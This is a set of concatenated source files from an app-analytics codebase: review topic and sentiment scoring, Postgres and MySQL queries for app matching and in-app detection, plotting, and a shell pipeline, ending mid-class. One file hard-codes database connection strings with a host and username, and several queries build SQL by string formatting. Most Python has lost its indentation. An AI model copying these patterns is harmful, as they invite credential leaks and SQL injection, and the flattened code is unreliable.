corpus_df = pd.DataFrame(dictionary.doc2bow(itertools.chain(*df[reviews_filter]['review'])))
corpus_df.rename(columns={0: 'topic_id', 1: 'frequency'}, inplace=True)
corpus[topic] = corpus_df.copy()
return corpus
def create_topic_corpus(chunk_files, seed_ids, dictionary, seed_terms=SEED_TERMS):
    D = delayed(_make_topic_corpus)
    a = [D(i, seed_ids, dictionary) for i in chunk_files]
os.system('taskset -p 0xffffffff %d' % os.getpid())
result = Parallel(n_jobs=JOBS, verbose=5, pre_dispatch=JOBS, temp_folder=MEM_FOLDER)(a)
topic_corpus = {}
first = {}
for topic in seed_terms:
first[topic] = True
for r in result:
for topic in seed_terms:
if first[topic]:
topic_corpus[topic] = r[topic].copy()
first[topic] = False
else:
topic_corpus[topic] = pd.concat([topic_corpus[topic], r[topic]])
topic_corpus[topic] = topic_corpus[topic].groupby('topic_id').sum().reset_index()
del result
cPickle.dump(topic_corpus, open('{}/topic_corpus.pk'.format(TMP_DIR), "wb"))
return topic_corpus
def load_topic_corpus(tmp_dir=TMP_DIR):
topic_corpus = cPickle.load(open('{}/topic_corpus.pk'.format(tmp_dir), "rb"))
return topic_corpus
"""
PHASE 6
Get weights for each ngram for each topic
Put everything into a dictionary
Save cPickle or load from cPickle
"""
def create_topic_weights(total_frequencies, topic_corpus, dictionary, data_dir=DATA_DIR, tmp_dir=TMP_DIR):
frequency_file = open('{}/word_fequencies.csv'.format(data_dir), 'w')
frequency_file.write('topic,term,frequency_in_topic,total_frequency,weight\n')
len_total_frequencies = len(total_frequencies)
topic_weights = {}
for topic in topic_corpus:
topic_weights[topic] = {}
for w in topic_corpus[topic].iterrows():
wid = w[1]['topic_id']
frequency = w[1]['frequency']
if wid < len_total_frequencies:
weight = float(frequency)/total_frequencies[wid]
frequency_line = '{},{},{},{},{}\n'.format(topic, dictionary[wid], frequency,
total_frequencies[wid], weight)
frequency_file.write(frequency_line)
topic_weights[topic][wid] = weight
frequency_file.close()
cPickle.dump(topic_weights, open('{}/topic_weights.pk'.format(tmp_dir), "wb"))
return topic_weights
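# Worked example (hypothetical counts): an ngram that occurs 30 times in the
# whole corpus but 24 times inside reviews matched to 'crashes' gets
# weight = 24.0 / 30 = 0.8 for that topic.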
def load_topic_weights(tmp_dir=TMP_DIR):
topic_weights = cPickle.load(open('{}/topic_weights.pk'.format(tmp_dir), "rb"))
return topic_weights
"""
PHASE 7
Filter out ngrams with low weight.
Now weight_threshold is 0, we are not filtering ngrams.
"""
def filter_low_weight_ngrams(topic_weights, seed_terms=SEED_TERMS):
topic_weights_original = deepcopy(topic_weights)
weight_threshold = 0
if weight_threshold > 0:
topic_weights = deepcopy(topic_weights_original)
for test_topic in seed_terms:
for w in topic_weights[test_topic].keys():
if topic_weights[test_topic][w] < weight_threshold:
del topic_weights[test_topic][w]
_ = gc.collect()
print test_topic, len(topic_weights[test_topic]), len(topic_weights_original[test_topic])
return topic_weights
def _get_scores(chunk_file, topic_weights, main_topics):
"""
Generate scores per topic for each review.
The score is an absolute value we will use to decide if a review belongs to a topic or not.
@param chunk_file: Dataframe to process
@return:
"""
df = cPickle.load(open(chunk_file, "rb"))
df = df.fillna(0.0)
df = df[df['total_ngrams'] > 0]
scores = {}
for topic in topic_weights:
scores[topic] = []
for idx, row in df.iterrows():
for topic in topic_weights:
score = 0.0
for w in row['freq']:
if w[0] in topic_weights[topic]:
score += topic_weights[topic][w[0]]*w[1]
score /= row['total_ngrams']
scores[topic].append(score)
for topic in topic_weights:
df[topic] = scores[topic]
del df['total_ngrams']
df = df[df[main_topics].sum(axis=1) > 0]
def normalize(x):
sentiment_sum = x[['positive', 'negative']].sum()
if sentiment_sum > 0:
return ((x['positive'] / sentiment_sum) * 2.0) - 1.0
else:
return 0.0
df = df.fillna(0.0)
df['positive'] = df.apply(normalize, axis=1)
del df['negative']
for topic in main_topics:
sentiment_topic = 'sentiment_{}'.format(topic)
df[sentiment_topic] = df[topic] * df['positive']
df = df.fillna(0.0)
df = df.groupby('id').mean().reset_index()
df.to_csv('{}.csv'.format(chunk_file), index=False)
"""
PHASE 8
Assign a score per topic to each review
"""
def generate_review_score(chunk_files, topic_weights, main_topics):
    D = delayed(_get_scores)
    a = [D(i, topic_weights, main_topics) for i in chunk_files]
os.system('taskset -p 0xffffffff %d' % os.getpid())
Parallel(n_jobs=JOBS, verbose=5, pre_dispatch=JOBS, temp_folder=MEM_FOLDER)(a)
def _load_df(chunk_file_name, index_df):
"""
    Load previously built dataframe from csv
@param chunk_file_name: name of the file to load
@return: loaded Dataframe
"""
df = pd.read_csv('{}.csv'.format(chunk_file_name))
df = df.merge(index_df, on='id')
del df['title']
del df['text']
#del df['id']
del df['reviewer']
df['month'] = df['date'].apply(lambda x: x[:7])
del df['date']
return df
def _set_review_as_topic(x):
    """
    If the review score for a given topic is higher than score_threshold it is considered part of that topic.
    A score_threshold of 1.0 equals the average of all reviews for each topic.
    @param x: list of scores
    @return: list of 0 or 1; if 1 the review belongs to the topic
    """
    score_threshold = 1.5
    result = []
    for i in x:
        if i >= score_threshold:
            result.append(1.)
        else:
            result.append(0.)
    return result
def _normalize_sentiment(x):
"""
    Accessory function to convert sentiment from the [-1, 1] range to 0/1
    @param x: value to normalize
    @return: normalized value (1. if positive, 0. if negative, NaN otherwise)
"""
result = np.nan
if x > 0:
result = 1.
elif x < 0:
result = 0.
return result
def _apply_topic_and_sentiment(df, main_topics):
"""
Generate topic and sentiment series based on scores for each review
@param df: Dataframe with topic scores and reviews
    @return: Dataframe with classified reviews
"""
df = df.copy()
for col in main_topics:
col_mean = df[col].mean()
df[col] /= col_mean
df[main_topics] = df[main_topics].apply(_set_review_as_topic, axis=1)
for col in main_topics:
sentiment_col = 'sentiment_{}'.format(col)
df[sentiment_col] = df[col] * df[sentiment_col]
df[sentiment_col] = df[sentiment_col].apply(_normalize_sentiment)
return df
def _get_max_version_mean(df, groupby_cols):
"""
    Accessory function to get scores mean
@param df: dataframe to get mean of
@return: mean of dataframe
"""
del df['id']
del df['positive']
df = df.groupby(groupby_cols).mean().reset_index()
return df
"""
PHASE 9
Classify scored reviews in topics.
Filter out unclassified reviews.
Aggregate all scores per month-app-version.
Write to result to csv file.
"""
def classify_reviews(chunk_files, index_df, main_topics):
print '9: Aggregating scores per app-month'
groupby_cols = ['app_id', 'month', 'version']
if not PHASE[1]:
index_df = pd.read_csv(reviews_path)
D = delayed(_load_df)
a = [D(i, index_df) for i in chunk_files]
os.system('taskset -p 0xffffffff %d' % os.getpid())
df = pd.concat(Parallel(n_jobs=JOBS, verbose=5, pre_dispatch=JOBS, temp_folder=MEM_FOLDER)(a))
size_df = df.groupby(groupby_cols).size().reset_index()
size_df['count'] = size_df[0]
size_df = size_df[size_df['count'] >= 100]
del size_df[0]
def producer():
for n, g in df.groupby(['month']):
yield g
D = delayed(_apply_topic_and_sentiment)
    a = [D(i, main_topics) for i in producer()]
os.system('taskset -p 0xffffffff %d' % os.getpid())
df = pd.concat(Parallel(n_jobs=JOBS, verbose=5, pre_dispatch=JOBS, temp_folder=MEM_FOLDER)(a))
np.random.seed(42)
rows = random.sample(df.index, 300)
pd.merge(df, index_df, on=['app_id', 'id', 'version']).to_csv('{}/full_reviews.csv'.format(DATA_DIR), index=False)
def producer():
for n, g in df.groupby(groupby_cols):
yield g
D = delayed(_get_max_version_mean)
a = [D(i, groupby_cols) for i in producer()]
os.system('taskset -p 0xffffffff %d' % os.getpid())
df = pd.concat(Parallel(n_jobs=JOBS, verbose=5, pre_dispatch=JOBS, temp_folder=MEM_FOLDER)(a))
df['addiction_a'] = df['addiction'] * df['sentiment_addiction']
df['sentiment_addiction_a'] = 1.
df['crashes_a'] = df['crashes'] * (1.-df['sentiment_crashes'])
df['sentiment_crashes_a'] = 0.
df['value_a'] = df['value'] * df['sentiment_value']
df['sentiment_value_a'] = 1.
df['virality_a'] = df['virality'] * df['sentiment_virality']
df['sentiment_virality_a'] = 1.
df['usability_a'] = df['usability'] * df['sentiment_usability']
df['sentiment_usability_a'] = 1.
non_indexable = ['app_id', 'month', 'app_name', 'version']
indexable = df.columns
indexable = [x for x in indexable if x not in non_indexable]
result = []
df = df.merge(size_df, on=groupby_cols)
for n,g in df.groupby(['month']):
for col in indexable:
indexed_col = 'indexed_{}'.format(col)
g[indexed_col] = g[col] / g[col].mean()
result.append(g)
df = pd.concat(result)
df.to_csv('{}/sentiment_per_app.csv'.format(DATA_DIR), index=False)
print '9: Aggregating scores per app-month - done'
<file_sep>/downloads_retention/match_bundleId.py
import psycopg2
import sys
import pandas as pd
def match_bundleId(_data_):
# iOS
try:
conn_string = "host='ds-db-1.appannie.org' dbname='aa' user='syan' password='<PASSWORD>'"
bundle_id = list(_data_[_data_['Device Type'].isin(['iPhone', 'iPad'])]['bundle_id'].\
apply(str).unique())
bundle_id = ','.join(bundle_id)
query = '''
SELECT Y.id as app_id, X.name as category_name, Y.name as app_name
from
webanalytics_category X
inner join
(
SELECT * FROM aa_app
where id IN ({})
) Y
on X.id = Y.category_id
'''.format(bundle_id)
mapping_table = pd.read_sql(query, con=psycopg2.connect(conn_string))
print 'iOS', _data_[_data_['Device Type']=='iPhone'].shape
_dat_iOS = pd.merge(_data_, mapping_table, left_on=['bundle_id'], right_on=['app_id'])
print _dat_iOS.shape
    except Exception:
        # Fall back to an empty frame when there are no iOS rows or the query fails.
        _dat_iOS = pd.DataFrame()
# Android
conn_string = "host='ds-db-1.appannie.org' dbname='aa_android' user='syan' password='<PASSWORD>'"
bundle_id = list(_data_[_data_['Device Type'].isin(['Android Mobile', 'Android Tablet'])]['bundle_id'].\
apply(str).unique())
bundle_id = ','.join(bundle_id)
query = '''
SELECT Y.id as bundle_id, Y.class as app_id, X.name as category_name, Y.name as app_name
from
category X
inner join
(
SELECT * FROM app
where id IN ({})
) Y
on X.id = Y.category_id
'''.format(bundle_id)
mapping_table = pd.read_sql(query, con=psycopg2.connect(conn_string))
print 'Android', _data_[_data_['Device Type']=='Android Mobile'].shape
_dat_Android = pd.merge(_data_, mapping_table, left_on=['bundle_id'], right_on=['bundle_id'])
print _dat_Android.shape
new_data = _dat_Android.append(_dat_iOS, ignore_index=True)
return new_data
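# Usage sketch: match_bundleId expects a DataFrame with at least the columns
# 'bundle_id' and 'Device Type' (values like 'iPhone', 'iPad',
# 'Android Mobile', 'Android Tablet') and returns the same rows enriched with
# app_id, category_name and app_name from the aa / aa_android databases.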
if __name__ == '__main__':
temp = pd.read_csv('./dump_rincon.csv')
match_bundleId(temp).to_csv('./rincon_inband.csv',index=False)
<file_sep>/plotting/plot.py
'''
Created on Apr 12, 2013
@author: perezrafael
'''
import pandas as pd
import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import itertools
import os
## This is the dir where we store the plots
USE_COLOR_MAP = True
if __name__ == '__main__':
## These are the files with the quality metrics we want to compare, key is model name
#input_files = {'universals_daily_2013-01':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily_universals/2013-01/result.csv',
# 'original_daily_2013-01':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily/2013-01/result.csv',
# 'universals_daily_2013-02':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily_universals/2013-02/result.csv',
# 'original_daily_2013-02':'/Users/perezrafael/appannie/data_science/evaluation/data/ios_daily/2013-02/result.csv'}
month = '2013-01'
platform = 'ios'
PLOTS_DIR = '/Users/perezrafael/appannie/data_science/plotting/plots/%s_%s_universals'%(platform, month)
#input_files = {'original':'/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_original/%s/result.csv'%(platform, month),
# 'dynamic':'/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_dynamic/%s/result.csv'%(platform, month),
# 'preview':'/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_preview/%s/result.csv'%(platform, month)}
input_files = {'webui':'/Users/perezrafael/appannie/data_science/evaluation/data/%s_webui_dynamic/%s/result.csv'%(platform, month),
'train_single_day_data':'/Users/perezrafael/appannie/data_science/evaluation/data/%s_daily/%s/result.csv'%(platform, month),
'universal_model_2013-01':'/Users/perezrafael/appannie/data_science/evaluation/data/%s_universals_using_2013-01/%s/result.csv'%(platform, month),
'universal_model_2013-02':'/Users/perezrafael/appannie/data_science/evaluation/data/%s_universals_using_2013-02/%s/result.csv'%(platform, month)}
color_map = {'webui':'g',
'train_single_day_data':'c',
'universal_model_2013-01':'r',
'universal_model_2013-02':'b'}
if not os.path.exists(PLOTS_DIR):
os.makedirs(PLOTS_DIR)
metrics = {}
models = sorted(input_files.keys())
for model in input_files:
metrics[model] = pd.read_csv(input_files[model])
metrics[model]['model'] = model
#models.append(model)
metrics = pd.concat(metrics)
metrics.sort(['model', 'period', 'country', 'unit'], inplace=True)
columns = metrics.columns
total_models=len(models)
units = metrics['unit'].drop_duplicates()
periods = metrics['period'].drop_duplicates()
countries = metrics['country'].drop_duplicates()
width = 0.15
for column in columns:
for period in periods:
for unit in units:
error = False
colors = itertools.cycle(['b', 'g', 'r', 'c', 'm', 'y', 'k'])
plt.clf()
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_title('%s\n%s - %s'%(column, unit, period))
ax.set_color_cycle(['r', 'g', 'b', 'c'])
ind = np.arange(len(countries))
indb = ind
rects=[]
for model in models:
if USE_COLOR_MAP:
color = color_map[model]
else:
color = colors.next()
values = metrics[(metrics['model']==model) & (metrics['unit']==unit)][column].values
try:
rects.append(ax.bar(indb, values, width, color=color))
except:
error = True
indb = indb+width
if error:
continue
#plt.ylim(0, metrics[column].max()*1.5)
ax.set_xticks(ind+width)
ax.set_xticklabels(countries)
ax.legend(rects, models, loc='best')
plt.savefig('%s/%s_%s_%s.png'%(PLOTS_DIR, column, unit, period))
<file_sep>/exact-matching-improvement/lib/queries.py
import config as cf
db_links = {
'ios_link': """
select
dblink_connect('ios_link','dbname=aa host={host_name} user={user_name} password={password}');
""".format(host_name=cf.host, user_name=cf.user, password=cf.password),
'android_link': """
select dblink_connect('android_link','dbname=aa_android host={host_name} user={user_name} password={password}');
""".format(host_name=cf.host, user_name=cf.user, password=cf.password)
}
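# Usage sketch (assuming a psycopg2 cursor named cur): each dblink connection
# is opened once per session before any of the cross-database queries below
# are run, e.g.:
#   cur.execute(db_links['ios_link'])
#   cur.execute(db_links['android_link'])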
ios_queries = {
'drop_ios_matches': """
drop table if exists ios_matches;
""",
'create_ios_matches': """
create temporary table ios_matches
as
select
ios_match.market,
ios_match.universal_app_id,
ios_match.app_id
from
dblink('ios_link',
' select
universal_app_id,
app_id,
market
from
dna_universal_app_mapping
where
market = $$ios$$
') as ios_match(universal_app_id bigint, app_id bigint, market varchar);
alter table ios_matches add primary key (app_id);
""",
'drop_ios_apps': """
drop table if exists ios_apps;
""",
'create_ios_apps': """
create temporary table ios_apps
as
select
ios_app.id,
ios_app.app_name,
ios_app.company,
ios_app.icon_url
from
dblink('ios_link',
'select
id,
name,
company,
artwork_url
from
aa_app
') as ios_app(id bigint, app_name varchar, company varchar, icon_url varchar);
alter table ios_apps add primary key (id);
""",
'select_ios_features': """
select
*
from
ios_features;
""",
'create_ios_features': """
drop table if exists ios_features;
create table ios_features(
app_pk serial primary key,
market varchar(30),
universal_app_id bigint,
app_id bigint,
app_name varchar,
company varchar,
icon_url varchar);
insert into ios_features(market, universal_app_id, app_id, app_name, company, icon_url)
select
im.market,
im.universal_app_id,
im.app_id,
ia.app_name,
ia.company,
ia.icon_url
from
ios_apps ia
join ios_matches im on im.app_id = ia.id;
"""
}
android_queries = {
'drop_android_matches':
"""drop table if exists android_matches;
""",
'create_android_matches':"""
create temporary table android_matches
as
select
android_match.market,
android_match.universal_app_id,
android_match.app_id
from
dblink('ios_link',
'select
universal_app_id,
app_id,
market
from
dna_universal_app_mapping
where
market = $$gp$$
') as android_match(universal_app_id bigint, app_id bigint, market varchar);
alter table android_matches add primary key (app_id);
""",
'drop_android_apps': """
drop table if exists android_apps;
""",
'create_android_apps': """
create temporary table android_apps
as
select
android_app.id,
android_app.app_name,
android_app.company,
android_app.icon_url
from
dblink('android_link',
' select
id,
name,
company,
icon_url
from
app
') as android_app(id bigint, app_name varchar, company varchar, icon_url varchar);
alter table android_apps add primary key (id);
""",
'create_android_features': """
drop table if exists android_features;
create table android_features(
app_pk serial primary key,
market varchar(30),
universal_app_id bigint,
app_id bigint,
app_name varchar,
company varchar,
icon_url varchar);
insert into android_features(market, universal_app_id, app_id, app_name, company, icon_url)
select
am.market,
am.universal_app_id,
am.app_id,
aa.app_name,
aa.company,
aa.icon_url
from
android_apps aa
join android_matches am on am.app_id = aa.id;
""",
'select_android_features': """
select
*
from
android_features;
"""
}
general_queries = {
'select_dna_excluded_terms': """
select
dna_excluded.content
from
dblink(
'ios_link',
'select
content
from
dna_excluded_terms
where type ={type};') as dna_excluded(content varchar);
""",
'create_processed_dna_feature_table': """
create table processed_feature_{new_feature}(
app_pk integer,
market varchar,
universal_app_id bigint,
app_id bigint,
{new_feature} {feature_type},
primary key (app_pk));
""",
'insert_processed_dna_feature': """
insert into processed_feature_{new_feature}(
app_pk,
market,
universal_app_id,
app_id,
{new_feature})
values(
%(app_pk)s,
%(market)s,
%(universal_app_id)s,
%(app_id)s,
%({new_feature})s)
""",
'drop_processed_dna_feature': """
drop table if exists processed_feature_{new_feature};
""",
'create_all_features': """
drop table if exists all_features;
create table all_features(
app_pk serial primary key,
market varchar(30),
universal_app_id bigint,
app_id bigint,
app_name varchar,
company varchar,
icon_url varchar);
insert into all_features(market, universal_app_id, app_id, app_name, company, icon_url)
select
am.market,
am.universal_app_id,
am.app_id,
aa.app_name,
aa.company,
aa.icon_url
from
android_apps aa
join android_matches am on am.app_id = aa.id;
insert into all_features(market, universal_app_id, app_id, app_name, company, icon_url)
select
im.market,
im.universal_app_id,
im.app_id,
ia.app_name,
ia.company,
ia.icon_url
from
ios_apps ia
join ios_matches im on im.app_id = ia.id;
""",
'select_all_features': """
select
*
from
all_features;
""",
'select_icon_input': """
select app_id, market, icon_url, app_name as name from all_features;
"""
}
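# A minimal usage sketch for the templated queries above (the connection
# string and feature name below are illustrative assumptions, not part of
# this module). Identifier placeholders like {new_feature} are expanded with
# str.format(); value placeholders like %(app_pk)s are bound by psycopg2 at
# execute time.
#
#   import psycopg2
#   conn = psycopg2.connect('dbname=matching')
#   cur = conn.cursor()
#   cur.execute(general_queries['create_processed_dna_feature_table'].format(
#       new_feature='clean_name', feature_type='varchar'))
#   insert = general_queries['insert_processed_dna_feature'].format(new_feature='clean_name')
#   cur.execute(insert, {'app_pk': 1, 'market': 'ios', 'universal_app_id': 10,
#                        'app_id': 100, 'clean_name': 'some app'})
#   conn.commit()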
metric_queries = {
'create_dna_levenshtein_metric_table': """
drop table if exists dna_metric_levenshtein_{feature_name};
create table dna_metric_levenshtein_{feature_name}(
serial_id serial primary key,
app_pk_from integer,
app_pk_to integer,
levenshtein_ratio real,
is_a_match boolean);
insert into dna_metric_levenshtein_{feature_name} (app_pk_from, app_pk_to, levenshtein_ratio, is_a_match)
select
a.app_pk as app_pk_from,
b.app_pk as app_pk_to,
levenshtein_ratio(a.{feature_name}, b.{feature_name}) as levenshtein_ratio,
case when a.universal_app_id = b.universal_app_id then True else False end as is_a_match
from
processed_feature_{feature_name} a, processed_feature_{feature_name} b
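        -- a.app_pk > b.app_pk keeps each unordered pair exactly once (n*(n-1)/2 rows)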
where a.app_pk > b.app_pk;
        drop index if exists from_index_{feature_name}_index;
        drop index if exists to_index_{feature_name}_index;
        drop index if exists levenshtein_match_{feature_name}_index;
create index from_index_{feature_name}_index on dna_metric_levenshtein_{feature_name} (app_pk_from);
create index to_index_{feature_name}_index on dna_metric_levenshtein_{feature_name} (app_pk_to);
create index levenshtein_match_{feature_name}_index on dna_metric_levenshtein_{feature_name} (levenshtein_ratio,is_a_match);
""",
'create_dna_extended_levenshtein_metric_table':"""
drop table if exists dna_metric_levenshtein_{feature_name}_extended;
create table dna_metric_levenshtein_{feature_name}_extended(
serial_id serial primary key,
app_pk_from integer,
app_pk_to integer,
levenshtein_ratio real,
is_a_match boolean,
{original_feature_name}_from varchar,
{original_feature_name}_to varchar,
{feature_name}_from varchar,
{feature_name}_to varchar);
insert into dna_metric_levenshtein_{feature_name}_extended (app_pk_from, app_pk_to, levenshtein_ratio, is_a_match, {original_feature_name}_from, {original_feature_name}_to, {feature_name}_from, {feature_name}_to)
select
t.*,
f_1.{original_feature_name} as {original_feature_name}_from,
f_2.{original_feature_name} as {original_feature_name}_to,
p_1.{feature_name} as {feature_name}_from,
p_2.{feature_name} as {feature_name}_to
from
dna_metric_levenshtein_{feature_name} t, all_features f_1, all_features f_2,
processed_feature_{feature_name} p_1, processed_feature_{feature_name} p_2
where
t.app_pk_from = f_1.app_pk
and t.app_pk_to = f_2.app_pk
and t.app_pk_from = p_1.app_pk
and t.app_pk_to = p_2.app_pk;
        drop index if exists from_index_{feature_name}_index_extended;
        drop index if exists to_index_{feature_name}_index_extended;
        drop index if exists levenshtein_match_{feature_name}_index_extended;
create index from_index_{feature_name}_index_extended on dna_metric_levenshtein_{feature_name}_extended (app_pk_from);
create index to_index_{feature_name}_index_extended on dna_metric_levenshtein_{feature_name}_extended (app_pk_to);
create index levenshtein_match_{feature_name}_index_extended on dna_metric_levenshtein_{feature_name}_extended (levenshtein_ratio,is_a_match);
""",
'select_dna_metric_levenshtein_with_citerion': """
select
*
from
dna_metric_levenshtein_{feature_name}
where is_a_match = {match_criterion};
""",
'select_dna_metric_levenshtein': """
select
*
from
dna_metric_levenshtein_{feature_name};
""",
'select_dna_metric_levenshtein_extended': """
select
*
from
dna_metric_levenshtein_{feature_name}_extended
where
levenshtein_ratio >= {lower_bound} and levenshtein_ratio <= {upper_bound}
and is_a_match = {criterion};
""",
'select_dna_metric_levenshtein_sample_app': """
drop table if exists temp_random_select_from_features;
create temp table temp_random_select_from_features (like all_features including defaults);
insert into temp_random_select_from_features
select
*
from
all_features order by random() limit {n_apps};
select
m.*
from
temp_random_select_from_features f, dna_metric_levenshtein_{feature_name} m
where f.app_pk = m.app_pk_from;
""",
'select_dna_sample': """
select
*
from {table_name}
where
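            -- assumption: ~21e6 rows in {table_name}; serial_ids are drawn at random and
            -- oversampled by sqrt(num_samples) to compensate for collisions and misses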
serial_id in (select round(random() * 21e6)::integer as serial_id from generate_series(1, ({num_samples} + sqrt({num_samples})::integer)) group by serial_id)
limit {num_samples};
""",
'select_confusion_matrix_real': """
select
s.label,
s.predicted,
count(s.*)
from
(
select
case when t.{feature_name} >= {threshold_value} then 1 else 0 end as predicted,
case when t.{label} = True then 1 else 0 end as label
from
(
select {feature_name}, {label} from {table}
) t
) s
group by s.label, s.predicted;
""",
'select_confusion_matrix_bool': """
select
s.label,
s.predicted,
count(s.*)
from
(
select
case when t.{feature_name} is {threshold_value} then 1 else 0 end as predicted,
case when t.{label} = True then 1 else 0 end as label
from
(
select {feature_name}, {label} from {table}
) t
) s
group by s.label, s.predicted;"""
}
function_queries = {
'create_function_levenshtein_ratio': """
create or replace function
levenshtein_ratio(a_string varchar, b_string varchar) returns real as $$
declare result real;
declare a_string_length real;
declare b_string_length real;
begin
a_string_length = char_length(a_string);
b_string_length = char_length(b_string);
if (a_string_length > 0 and b_string_length > 0) then
result = 1 - (levenshtein(a_string, b_string) / greatest(a_string_length, b_string_length));
else
result = 0;
end if ;
return result;
end
$$ language plpgsql;
"""
}
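# Note: levenshtein() is provided by PostgreSQL's fuzzystrmatch extension, so
# `create extension if not exists fuzzystrmatch;` must have been run first.
# Illustrative example of the resulting similarity ratio:
#   select levenshtein_ratio('angry birds', 'angry birds free');
#   -- edit distance 5, longest length 16 -> 1 - 5/16 = 0.6875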
<file_sep>/old_investigations/generate_monthly_weights.sh
#!/bin/sh
aa_dir="/Users/perezrafael/appannie/aa"
data_science_dir="/Users/perezrafael/appannie/data_science"
function usage()
{
echo "Calculate estimates normally, then by scaling"
echo ""
echo "./generate_monthly_weights.sh"
echo "\t-h --help"
echo "\t-m --month"
echo "\t-p --period"
echo "\t-c --country-id"
echo "\t-n --country-name"
echo "\t-i --category-id"
echo "\taa_dir=$aa_dir"
echo "\tdata_science_dir=$data_science_dir"
echo ""
}
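# Example invocation (argument values are illustrative, not real defaults):
# ./generate_monthly_weights.sh --month=2013-01 --period=2013-01-01--2013-01-31 --country-id=143441 --country-name=United_States --category-id=6014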
while [ "$1" != "" ]; do
PARAM=`echo $1 | awk -F= '{print $1}'`
VALUE=`echo $1 | awk -F= '{print $2}'`
case $PARAM in
-h | --help)
usage
exit
;;
-m | --month)
month=$VALUE
;;
-p | --period)
period=$VALUE
;;
-c | --country-id)
country_id=$VALUE
;;
-n | --country-name)
country_name=$VALUE
;;
-i | --category-id)
category_id=$VALUE
;;
*)
echo "ERROR: unknown parameter \"$PARAM\""
usage
exit 1
;;
esac
shift
done
downloads="./data/${country_name}_${period}_Downloads.csv"
usd="./data/${country_name}_${period}_USD.csv"
weights="./cache/${country_id}_${category_id}_weigths.csv"
echo $downloads
echo $usd
cd $data_science_dir
python $aa_dir/estimation/ios/gen_rank_data.py -m $month -s $country_id -c $category_id
python $aa_dir/estimation/ios/curve_top.py -m $month -s $country_id
python $aa_dir/estimation/ios/curve_overall.py -m $month -s $country_id
#python $aa_dir/estimation/ios/curve_others.py -m $month -s $country_id -c $category_id
python $data_science_dir/run_fetch_and_concat.py -s $country_id -d $month -u Downloads,USD -x
python $data_science_dir/run_calculate_sda.py -d "$downloads" -u "$usd"
rm -f -r ./data_original
rm -f -r ./sda_original
mv -f ./data ./data_original
mv -f ./sda ./sda_original
python $aa_dir/estimation/ios/gen_rank_data.py -m $month -s $country_id -c $category_id -w "$weights"
python $aa_dir/estimation/ios/curve_top.py -m $month -s $country_id
python $aa_dir/estimation/ios/curve_overall.py -m $month -s $country_id
#python $aa_dir/estimation/ios/curve_others.py -m $month -s $country_id -c $category_id
python $data_science_dir/run_fetch_and_concat.py -s $country_id -d $month -u Downloads,USD -x
python $data_science_dir/unweight_estimates.py -e "$downloads" -w "$weights"
python $data_science_dir/unweight_estimates.py -e "$usd" -w "$weights"
python $data_science_dir/run_calculate_sda.py -d "$downloads" -u "$usd"
rm -f -r ./data_weighted
rm -f -r ./sda_weighted
mv -f ./data ./data_weighted
mv -f ./sda ./sda_weighted
<file_sep>/int-vs-m-benchmark/sql/ios/1000d1-prepare_application_data-inapp_details.sql
/*
FUNCTIONAL DESCRIPTION : Determines if an app has IAP.
DEPENDS ON TABLE(S) : temp.rankings_hourly, temp.rankings_daily, appstore.application_details
RESULTS IN TABLE(S) : temp.in_app
PROCEDURE : STEP 1. Start with checking the ('gross' and 'paid') hourly and daily rankings; if the maximal app price in this ranking is in (0, null), then has_inapps = TRUE
            STEP 2. We're missing the paid apps with price > 0, therefore check application_details for each app that appears in those rankings
                     - take a large period into account because application_details are not updated every day
                     - pick the most recent observation
            STEP 3. An app has in-app purchases if it has them in STEP 1 or STEP 2.
*/
-- STEP 1.
DROP TEMPORARY TABLE IF EXISTS temp.in_apps_from_all_rankings;
CREATE TEMPORARY TABLE temp.in_apps_from_all_rankings(
application_id int(10) unsigned NOT NULL,
has_inapps TINYINT unsigned DEFAULT NULL,
CONSTRAINT PRIMARY KEY (application_id)
)
AS
SELECT
r.application_id,
IF(MAX(IFNULL(r.price_usd,0)) = 0, 1, null) as has_inapps
FROM
temp.rankings r
WHERE
r.type in ('gross','paid')
GROUP BY
r.application_id
;
-- STEP 2.
-- iap from application_details:
DROP TEMPORARY TABLE IF EXISTS temp.application_details;
CREATE TEMPORARY TABLE temp.application_details(
application_id int(10) unsigned NOT NULL,
has_inapps TINYINT NOT NULL
)
AS
SELECT
application_id,
in_app_purchases AS has_inapps
FROM
(
SELECT
x.*,
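            /* user-variable trick emulating
               ROW_NUMBER() OVER (PARTITION BY application_id ORDER BY date DESC);
               modified_rank = 1 keeps only the most recent observation per app */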
IF(
(@prev=CONCAT('1','-',x.application_id)),
@rank:=@rank+1,
((@prev:=CONCAT('1','-',x.application_id)) AND (@rank:=1))
) AS modified_rank
FROM (
SELECT
a.application_id,
a.in_app_purchases
FROM appstore.application_details a
-- truncating the number of application that need to be considered
JOIN temp.in_apps_from_all_rankings r
ON r.application_id = a.application_id
WHERE
date BETWEEN DATE_ADD(LAST_DAY(DATE_SUB(@date, INTERVAL 3 MONTH)), INTERVAL 1 DAY)
AND DATE_ADD(@date, INTERVAL 1 DAY)
AND in_app_purchases IS NOT NULL
ORDER BY
application_id,
date DESC) x,
(SELECT @rank:=1, @prev:='') dummy
) buh
WHERE modified_rank = 1
;
-- STEP 3.
DROP TEMPORARY TABLE IF EXISTS temp.in_app;
CREATE TEMPORARY TABLE temp.in_app(
application_id int(10) unsigned NOT NULL,
has_inapps TINYINT NOT NULL,
CONSTRAINT PRIMARY KEY (application_id)
)
AS
SELECT
x.application_id,
MAX(x.has_inapps) AS has_inapps
FROM(
SELECT application_id, has_inapps FROM temp.application_details
UNION ALL
SELECT application_id, has_inapps FROM temp.in_apps_from_all_rankings WHERE has_inapps = 1
) x
GROUP BY
application_id
;
<file_sep>/aa_au_model/hive_scripts/workflow/module/hdfs.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
import subprocess
import os
import commands
class HDFSStorage(object):
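    """Thin wrappers around the `hadoop fs` command-line client.
    Minimal usage sketch (paths are hypothetical; assumes a working local
    `hadoop` CLI on the PATH):
        HDFSStorage.make_dir('/tmp/example')
        HDFSStorage.write('/tmp/example/data.txt', 'hello')
        for line in HDFSStorage.read_file('/tmp/example/data.txt'):
            print line.rstrip()
    """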
@staticmethod
def read_dir(path):
p = os.path.join(path, '*')
cat = subprocess.Popen(["hadoop", "fs", "-cat", p], stdout=subprocess.PIPE)
return cat.stdout
@staticmethod
